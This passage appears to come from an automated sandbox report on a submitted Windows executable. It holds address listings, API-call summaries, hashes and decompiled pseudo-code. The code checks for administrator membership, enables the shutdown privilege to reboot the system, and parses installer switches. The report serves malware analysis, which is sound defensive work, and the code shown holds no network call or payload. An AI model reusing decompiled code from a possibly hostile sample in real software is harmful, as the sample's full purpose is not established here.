                                                                                                                                                                                                                                            0x00a4613c
                                                                                                                                                                                                                                            0x00a4613e
                                                                                                                                                                                                                                            0x00a4613e
                                                                                                                                                                                                                                            0x00a46141
                                                                                                                                                                                                                                            0x00a46141
                                                                                                                                                                                                                                            0x00a46143
                                                                                                                                                                                                                                            0x00a46144
                                                                                                                                                                                                                                            0x00a4614a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46150
                                                                                                                                                                                                                                            0x00a46152
                                                                                                                                                                                                                                            0x00a4615c
                                                                                                                                                                                                                                            0x00a46170
                                                                                                                                                                                                                                            0x00a46172
                                                                                                                                                                                                                                            0x00a4617c
                                                                                                                                                                                                                                            0x00a46190
                                                                                                                                                                                                                                            0x00a46190
                                                                                                                                                                                                                                            0x00a46196
                                                                                                                                                                                                                                            0x00a461a5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a461ab
                                                                                                                                                                                                                                            0x00a461b9
                                                                                                                                                                                                                                            0x00a461c6
                                                                                                                                                                                                                                            0x00a461c6
                                                                                                                                                                                                                                            0x00a4617e
                                                                                                                                                                                                                                            0x00a46180
                                                                                                                                                                                                                                            0x00a4618a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4618a
                                                                                                                                                                                                                                            0x00a4615e
                                                                                                                                                                                                                                            0x00a46160
                                                                                                                                                                                                                                            0x00a4616a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4616a
                                                                                                                                                                                                                                            0x00a4615c
                                                                                                                                                                                                                                            0x00a4614a
                                                                                                                                                                                                                                            0x00a4610b
                                                                                                                                                                                                                                            0x00a4610e
                                                                                                                                                                                                                                            0x00a4610e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e59
                                                                                                                                                                                                                                            0x00a45e59
                                                                                                                                                                                                                                            0x00a45e5c
                                                                                                                                                                                                                                            0x00a4604f
                                                                                                                                                                                                                                            0x00a46056
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4605c
                                                                                                                                                                                                                                            0x00a4606e
                                                                                                                                                                                                                                            0x00a46071
                                                                                                                                                                                                                                            0x00a46073
                                                                                                                                                                                                                                            0x00a46075
                                                                                                                                                                                                                                            0x00a46075
                                                                                                                                                                                                                                            0x00a46078
                                                                                                                                                                                                                                            0x00a46078
                                                                                                                                                                                                                                            0x00a4607a
                                                                                                                                                                                                                                            0x00a4607b
                                                                                                                                                                                                                                            0x00a46081
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a46087
                                                                                                                                                                                                                                            0x00a46087
                                                                                                                                                                                                                                            0x00a4608d
                                                                                                                                                                                                                                            0x00a4609c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a460a2
                                                                                                                                                                                                                                            0x00a460aa
                                                                                                                                                                                                                                            0x00a460b2
                                                                                                                                                                                                                                            0x00a460b7
                                                                                                                                                                                                                                            0x00a460bd
                                                                                                                                                                                                                                            0x00a460bf
                                                                                                                                                                                                                                            0x00a460bf
                                                                                                                                                                                                                                            0x00a460d6
                                                                                                                                                                                                                                            0x00a460e0
                                                                                                                                                                                                                                            0x00a460e7
                                                                                                                                                                                                                                            0x00a460f5
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a460f5
                                                                                                                                                                                                                                            0x00a4609c
                                                                                                                                                                                                                                            0x00a46081
                                                                                                                                                                                                                                            0x00a45e62
                                                                                                                                                                                                                                            0x00a45e62
                                                                                                                                                                                                                                            0x00a45e65
                                                                                                                                                                                                                                            0x00a45fd3
                                                                                                                                                                                                                                            0x00a45fe9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45fef
                                                                                                                                                                                                                                            0x00a45fef
                                                                                                                                                                                                                                            0x00a45ff7
                                                                                                                                                                                                                                            0x00a45ffd
                                                                                                                                                                                                                                            0x00a46003
                                                                                                                                                                                                                                            0x00a46006
                                                                                                                                                                                                                                            0x00a46011
                                                                                                                                                                                                                                            0x00a46014
                                                                                                                                                                                                                                            0x00a4603d
                                                                                                                                                                                                                                            0x00a46016
                                                                                                                                                                                                                                            0x00a46018
                                                                                                                                                                                                                                            0x00a46019
                                                                                                                                                                                                                                            0x00a4601b
                                                                                                                                                                                                                                            0x00a46033
                                                                                                                                                                                                                                            0x00a4601d
                                                                                                                                                                                                                                            0x00a46020
                                                                                                                                                                                                                                            0x00a46029
                                                                                                                                                                                                                                            0x00a46022
                                                                                                                                                                                                                                            0x00a46022
                                                                                                                                                                                                                                            0x00a46022
                                                                                                                                                                                                                                            0x00a46020
                                                                                                                                                                                                                                            0x00a4601b
                                                                                                                                                                                                                                            0x00a46042
                                                                                                                                                                                                                                            0x00a46044
                                                                                                                                                                                                                                            0x00a46046
                                                                                                                                                                                                                                            0x00a4604a
                                                                                                                                                                                                                                            0x00a45ff7
                                                                                                                                                                                                                                            0x00a45fd5
                                                                                                                                                                                                                                            0x00a45fd8
                                                                                                                                                                                                                                            0x00a45fd8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e6b
                                                                                                                                                                                                                                            0x00a45e6b
                                                                                                                                                                                                                                            0x00a45e6e
                                                                                                                                                                                                                                            0x00a45f8b
                                                                                                                                                                                                                                            0x00a45f99
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45f9f
                                                                                                                                                                                                                                            0x00a45fa7
                                                                                                                                                                                                                                            0x00a45faf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45fb1
                                                                                                                                                                                                                                            0x00a45fb3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45fb5
                                                                                                                                                                                                                                            0x00a45fb7
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45fb9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45fb9
                                                                                                                                                                                                                                            0x00a45fb7
                                                                                                                                                                                                                                            0x00a45fb3
                                                                                                                                                                                                                                            0x00a45faf
                                                                                                                                                                                                                                            0x00a45f8d
                                                                                                                                                                                                                                            0x00a45f8d
                                                                                                                                                                                                                                            0x00a45f8d
                                                                                                                                                                                                                                            0x00a45f8f
                                                                                                                                                                                                                                            0x00a45fc1
                                                                                                                                                                                                                                            0x00a45fc1
                                                                                                                                                                                                                                            0x00a45fc1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e74
                                                                                                                                                                                                                                            0x00a45e74
                                                                                                                                                                                                                                            0x00a45e77
                                                                                                                                                                                                                                            0x00a45ea0
                                                                                                                                                                                                                                            0x00a45ebd
                                                                                                                                                                                                                                            0x00a45f79
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45f7f
                                                                                                                                                                                                                                            0x00a45ec3
                                                                                                                                                                                                                                            0x00a45ec3
                                                                                                                                                                                                                                            0x00a45ecc
                                                                                                                                                                                                                                            0x00a45ed4
                                                                                                                                                                                                                                            0x00a45ed6
                                                                                                                                                                                                                                            0x00a45edc
                                                                                                                                                                                                                                            0x00a45edf
                                                                                                                                                                                                                                            0x00a45eea
                                                                                                                                                                                                                                            0x00a45eed
                                                                                                                                                                                                                                            0x00a45f3f
                                                                                                                                                                                                                                            0x00a45f40
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45eef
                                                                                                                                                                                                                                            0x00a45eef
                                                                                                                                                                                                                                            0x00a45ef2
                                                                                                                                                                                                                                            0x00a45f34
                                                                                                                                                                                                                                            0x00a45ef4
                                                                                                                                                                                                                                            0x00a45ef4
                                                                                                                                                                                                                                            0x00a45ef7
                                                                                                                                                                                                                                            0x00a45f2b
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45ef9
                                                                                                                                                                                                                                            0x00a45ef9
                                                                                                                                                                                                                                            0x00a45efc
                                                                                                                                                                                                                                            0x00a45f22
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45efe
                                                                                                                                                                                                                                            0x00a45eff
                                                                                                                                                                                                                                            0x00a45f02
                                                                                                                                                                                                                                            0x00a45f16
                                                                                                                                                                                                                                            0x00a45f04
                                                                                                                                                                                                                                            0x00a45f07
                                                                                                                                                                                                                                            0x00a45f0d
                                                                                                                                                                                                                                            0x00a45f46
                                                                                                                                                                                                                                            0x00a45f46
                                                                                                                                                                                                                                            0x00a45f09
                                                                                                                                                                                                                                            0x00a45f09
                                                                                                                                                                                                                                            0x00a45f09
                                                                                                                                                                                                                                            0x00a45f07
                                                                                                                                                                                                                                            0x00a45f02
                                                                                                                                                                                                                                            0x00a45efc
                                                                                                                                                                                                                                            0x00a45ef7
                                                                                                                                                                                                                                            0x00a45ef2
                                                                                                                                                                                                                                            0x00a45f4c
                                                                                                                                                                                                                                            0x00a45f4e
                                                                                                                                                                                                                                            0x00a45f50
                                                                                                                                                                                                                                            0x00a45f54
                                                                                                                                                                                                                                            0x00a45ed4
                                                                                                                                                                                                                                            0x00a45ea2
                                                                                                                                                                                                                                            0x00a45ea4
                                                                                                                                                                                                                                            0x00a45eaf
                                                                                                                                                                                                                                            0x00a45eaf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e79
                                                                                                                                                                                                                                            0x00a45e7d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e83
                                                                                                                                                                                                                                            0x00a45e83
                                                                                                                                                                                                                                            0x00a45e83
                                                                                                                                                                                                                                            0x00a45e85
                                                                                                                                                                                                                                            0x00a45e85
                                                                                                                                                                                                                                            0x00a45e8e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e94
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45e94
                                                                                                                                                                                                                                            0x00a45e8e
                                                                                                                                                                                                                                            0x00a45e7d
                                                                                                                                                                                                                                            0x00a45e77
                                                                                                                                                                                                                                            0x00a45e6e
                                                                                                                                                                                                                                            0x00a45e65
                                                                                                                                                                                                                                            0x00a45e5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45dd0
                                                                                                                                                                                                                                            0x00a45dce
                                                                                                                                                                                                                                            0x00a45dca
                                                                                                                                                                                                                                            0x00a45dba
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a45d00
                                                                                                                                                                                                                                            0x00a45dd9
                                                                                                                                                                                                                                            0x00a45e04
                                                                                                                                                                                                                                            0x00a461fe
                                                                                                                                                                                                                                            0x00a45e0a
                                                                                                                                                                                                                                            0x00a45e0c
                                                                                                                                                                                                                                            0x00a45e17
                                                                                                                                                                                                                                            0x00a45e17
                                                                                                                                                                                                                                            0x00a45e04
                                                                                                                                                                                                                                            0x00a46200
                                                                                                                                                                                                                                            0x00a46200
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharNextA.USER32(?,00000000,?,?), ref: 00A45CEE
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(00A48B3E,00000104,00000000,?,?), ref: 00A45DFC
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A45E3E
                                                                                                                                                                                                                                            • CharUpperA.USER32(-00000052), ref: 00A45EE1
                                                                                                                                                                                                                                            • CompareStringA.KERNEL32(0000007F,00000001,RegServer,000000FF,?,000000FF), ref: 00A45F6F
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A45FA7
                                                                                                                                                                                                                                            • CharUpperA.USER32(-0000004E), ref: 00A46008
                                                                                                                                                                                                                                            • CharUpperA.USER32(?), ref: 00A460AA
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,00A41140,00000000,00000040,00000000), ref: 00A461F1
                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00A461F8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Upper$CloseCompareExitFileHandleModuleNameNextProcessString
                                                                                                                                                                                                                                            • String ID: "$"$:$RegServer
                                                                                                                                                                                                                                            • API String ID: 1203814774-25366791
                                                                                                                                                                                                                                            • Opcode ID: 44c67f821142a378932edfa6ec1e77b768871fbd78f7f3c260be7987f73bacef
                                                                                                                                                                                                                                            • Instruction ID: 394c94ce3314c098522f0d7d6f86e5a2795348be340c26d5a65d7d94b1a8bd56
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 44c67f821142a378932edfa6ec1e77b768871fbd78f7f3c260be7987f73bacef
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60D1487DE04A445FDB39CB789C493FA7B61ABD7340F1441AAC486C7192DAB58E878B02
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                                                                                                            			E00A418A3(void* __edx, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				short _v12;
                                                                                                                                                                                                                                            				struct _SID_IDENTIFIER_AUTHORITY _v16;
                                                                                                                                                                                                                                            				char _v20;
                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				long _t45;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				int _t50;
                                                                                                                                                                                                                                            				void* _t52;
                                                                                                                                                                                                                                            				signed int _t53;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t51 = __esi;
                                                                                                                                                                                                                                            				_t49 = __edx;
                                                                                                                                                                                                                                            				_t23 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t53;
                                                                                                                                                                                                                                            				_t25 =  *0xa48128; // 0x2
                                                                                                                                                                                                                                            				_t45 = 0;
                                                                                                                                                                                                                                            				_v12 = 0x500;
                                                                                                                                                                                                                                            				_t50 = 2;
                                                                                                                                                                                                                                            				_v16.Value = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if(_t25 != _t50) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					return E00A46CE0(_t25, _t45, _v8 ^ _t53, _t49, _t50, _t51);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(E00A417EE( &_v20) != 0) {
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					if(_v20 != 0) {
                                                                                                                                                                                                                                            						 *0xa48128 = 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(OpenProcessToken(GetCurrentProcess(), 8,  &_v28) == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(GetTokenInformation(_v28, _t50, 0, 0,  &_v24) != 0 || GetLastError() != 0x7a) {
                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                            					CloseHandle(_v28);
                                                                                                                                                                                                                                            					_t25 = _v20;
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_push(__esi);
                                                                                                                                                                                                                                            					_t52 = LocalAlloc(0, _v24);
                                                                                                                                                                                                                                            					if(_t52 == 0) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						_pop(_t51);
                                                                                                                                                                                                                                            						goto L17;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(GetTokenInformation(_v28, _t50, _t52, _v24,  &_v24) == 0 || AllocateAndInitializeSid( &_v16, _t50, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v32) == 0) {
                                                                                                                                                                                                                                            						L15:
                                                                                                                                                                                                                                            						LocalFree(_t52);
                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if( *_t52 <= 0) {
                                                                                                                                                                                                                                            							L14:
                                                                                                                                                                                                                                            							FreeSid(_v32);
                                                                                                                                                                                                                                            							goto L15;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t15 = _t52 + 4; // 0x4
                                                                                                                                                                                                                                            						_t50 = _t15;
                                                                                                                                                                                                                                            						while(EqualSid( *_t50, _v32) == 0) {
                                                                                                                                                                                                                                            							_t45 = _t45 + 1;
                                                                                                                                                                                                                                            							_t50 = _t50 + 8;
                                                                                                                                                                                                                                            							if(_t45 <  *_t52) {
                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa48128 = 1;
                                                                                                                                                                                                                                            						_v20 = 1;
                                                                                                                                                                                                                                            						goto L14;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}


















                                                                                                                                                                                                                                            0x00a418a3
                                                                                                                                                                                                                                            0x00a418a3
                                                                                                                                                                                                                                            0x00a418ab
                                                                                                                                                                                                                                            0x00a418b2
                                                                                                                                                                                                                                            0x00a418b5
                                                                                                                                                                                                                                            0x00a418be
                                                                                                                                                                                                                                            0x00a418c0
                                                                                                                                                                                                                                            0x00a418c6
                                                                                                                                                                                                                                            0x00a418c7
                                                                                                                                                                                                                                            0x00a418ca
                                                                                                                                                                                                                                            0x00a418cf
                                                                                                                                                                                                                                            0x00a419c9
                                                                                                                                                                                                                                            0x00a419d8
                                                                                                                                                                                                                                            0x00a419d8
                                                                                                                                                                                                                                            0x00a418df
                                                                                                                                                                                                                                            0x00a419b8
                                                                                                                                                                                                                                            0x00a419bd
                                                                                                                                                                                                                                            0x00a419bf
                                                                                                                                                                                                                                            0x00a419bf
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a419bd
                                                                                                                                                                                                                                            0x00a418fa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41912
                                                                                                                                                                                                                                            0x00a419aa
                                                                                                                                                                                                                                            0x00a419ad
                                                                                                                                                                                                                                            0x00a419b3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41927
                                                                                                                                                                                                                                            0x00a41927
                                                                                                                                                                                                                                            0x00a41932
                                                                                                                                                                                                                                            0x00a41936
                                                                                                                                                                                                                                            0x00a419a9
                                                                                                                                                                                                                                            0x00a419a9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a419a9
                                                                                                                                                                                                                                            0x00a4194c
                                                                                                                                                                                                                                            0x00a419a2
                                                                                                                                                                                                                                            0x00a419a3
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4196e
                                                                                                                                                                                                                                            0x00a41970
                                                                                                                                                                                                                                            0x00a41999
                                                                                                                                                                                                                                            0x00a4199c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4199c
                                                                                                                                                                                                                                            0x00a41972
                                                                                                                                                                                                                                            0x00a41972
                                                                                                                                                                                                                                            0x00a41975
                                                                                                                                                                                                                                            0x00a41984
                                                                                                                                                                                                                                            0x00a41985
                                                                                                                                                                                                                                            0x00a4198a
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4198c
                                                                                                                                                                                                                                            0x00a41991
                                                                                                                                                                                                                                            0x00a41996
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a41996
                                                                                                                                                                                                                                            0x00a4194c

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: LoadLibraryA.KERNEL32(advapi32.dll,00000002,?,00000000,?,?,?,00A418DD), ref: 00A4181A
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 00A4182C
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: AllocateAndInitializeSid.ADVAPI32(00A418DD,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,00A418DD), ref: 00A41855
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: FreeSid.ADVAPI32(?,?,?,?,00A418DD), ref: 00A41883
                                                                                                                                                                                                                                              • Part of subcall function 00A417EE: FreeLibrary.KERNEL32(00000000,?,?,?,00A418DD), ref: 00A4188A
                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000008,?,00000000,00000001), ref: 00A418EB
                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00A418F2
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,00000000,?), ref: 00A4190A
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00A41918
                                                                                                                                                                                                                                            • LocalAlloc.KERNEL32(00000000,?,?), ref: 00A4192C
                                                                                                                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?), ref: 00A41944
                                                                                                                                                                                                                                            • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00A41964
                                                                                                                                                                                                                                            • EqualSid.ADVAPI32(00000004,?), ref: 00A4197A
                                                                                                                                                                                                                                            • FreeSid.ADVAPI32(?), ref: 00A4199C
                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 00A419A3
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00A419AD
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2168512254-0
                                                                                                                                                                                                                                            • Opcode ID: a45435708c93c61d6be9f2f648a7a919dfca7bafb87563d94350ecd7d7cae439
                                                                                                                                                                                                                                            • Instruction ID: f06f9864223443bec2e1784e93c1d77a21b78208179178e3949cb9007e3dcfe3
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a45435708c93c61d6be9f2f648a7a919dfca7bafb87563d94350ecd7d7cae439
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 74313B7DA00209ABDB20DFE5EC88AAFBBB8FBD5340B100429E545E2151E7329946CB61
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                                            			E00A41F90(signed int __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				int _v12;
                                                                                                                                                                                                                                            				struct _TOKEN_PRIVILEGES _v24;
                                                                                                                                                                                                                                            				void* _v28;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				signed int _t13;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				void* _t25;
                                                                                                                                                                                                                                            				int _t28;
                                                                                                                                                                                                                                            				signed char _t30;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                                            				void* _t41;
                                                                                                                                                                                                                                            				signed int _t46;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t41 = __esi;
                                                                                                                                                                                                                                            				_t38 = __edi;
                                                                                                                                                                                                                                            				_t30 = __ecx;
                                                                                                                                                                                                                                            				if((__ecx & 0x00000002) != 0) {
                                                                                                                                                                                                                                            					L12:
                                                                                                                                                                                                                                            					if((_t30 & 0x00000004) != 0) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						if( *0xa49a40 != 0) {
                                                                                                                                                                                                                                            							_pop(_t30);
                                                                                                                                                                                                                                            							_t44 = _t46;
                                                                                                                                                                                                                                            							_t13 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                            							_push(_t38);
                                                                                                                                                                                                                                            							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                            								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                            								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                            								_v12 = 2;
                                                                                                                                                                                                                                            								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                            								CloseHandle(_v28);
                                                                                                                                                                                                                                            								_t41 = _t41;
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								if(_t21 != 0) {
                                                                                                                                                                                                                                            									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                            										_t25 = 1;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t37 = 0x4f7;
                                                                                                                                                                                                                                            										goto L3;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t37 = 0x4f6;
                                                                                                                                                                                                                                            									goto L4;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								_t37 = 0x4f5;
                                                                                                                                                                                                                                            								L3:
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								L4:
                                                                                                                                                                                                                                            								_push(0x10);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								_push(0);
                                                                                                                                                                                                                                            								E00A444B9(0, _t37);
                                                                                                                                                                                                                                            								_t25 = 0;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_pop(_t40);
                                                                                                                                                                                                                                            							return E00A46CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						_t37 = 0x522;
                                                                                                                                                                                                                                            						_t28 = E00A444B9(0, 0x522, 0xa41140, 0, 0x40, 4);
                                                                                                                                                                                                                                            						if(_t28 != 6) {
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							goto L14;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					__eax = E00A41EA7(__ecx);
                                                                                                                                                                                                                                            					if(__eax != 2) {
                                                                                                                                                                                                                                            						L16:
                                                                                                                                                                                                                                            						return _t28;
